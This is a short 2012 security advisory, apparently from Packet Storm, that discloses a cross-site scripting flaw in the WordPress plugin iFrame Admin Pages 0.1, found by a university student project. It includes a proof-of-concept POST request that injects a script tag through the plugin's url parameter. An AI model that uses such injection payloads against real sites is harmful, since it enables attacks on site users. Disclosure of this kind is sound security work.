WordPress iFrame Admin Pages 0.1 Cross Site Scripting

2012-05-15T00:00:00
ID PACKETSTORM:112701
Type packetstorm
Reporter Heine Pedersen
Modified 2012-05-15T00:00:00

Description

                                        
                                            `Hi  
  
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.  
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.  
  
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.  
  
Module: iFrame Admin Pages  
Version: 0.1  
  
Confirmed exploits:  
EXPLOIT:  
http://wp.bacon/wp-content/plugins/iframe-admin-pages/main_page.php  
POST DATA: url="><script>alert(1)</script>&newiframe=new&servicerequest=new  
  
  
  
  
  
Best Regards  
Heine Pedersen and Torben Jensen  
Student project group: sw101f12  
Aalborg University  
Denmark  
  
`